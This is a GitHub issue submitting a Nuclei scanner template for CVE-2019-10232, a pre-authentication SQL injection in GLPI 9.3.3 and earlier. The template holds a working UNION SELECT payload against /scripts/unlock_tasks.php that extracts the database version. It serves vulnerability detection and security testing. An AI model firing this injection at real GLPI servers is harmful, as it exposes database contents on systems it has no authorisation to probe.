### ISSUE TITLE
[nuclei-template] CVE-2019-10232 - GLPI_SQL_Injection

### ISSUE THREAD

**Issue by redteambrasil** [projectdiscovery/nuclei-templates#3136]
### Template Information:

CVE-2019-10232
GLPI <= 9.3.3 - GLPI Sql injection
GitHub Reference :  https://github.com/redteambrasil/nuclei-templates
![POC_CVE-2019-10232](https://user-images.githubusercontent.com/24315084/141646438-395ef170-bfe4-45d9-916f-0db7ce00505a.jpeg)
Poc Video: https://www.youtube.com/watch?v=OSDVTepQX0M

### Nuclei Template:

```yaml
id: GLPI_SQL_Injection

info: 
  author: RedTeamBrasil
  description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication."
  name: "Pre-authenticated SQL injection in GLPI <= 9.3.3"
  reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf"
  severity: high
  tags: glpi,cve,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
      - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"

    redirects: true
    max-redirects: 3
    matchers:
      - type: word
      	part: body
        words:
          - "-MariaDB-"

    extractors:
      - type: regex
        part: body
        regex:
          - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"

```
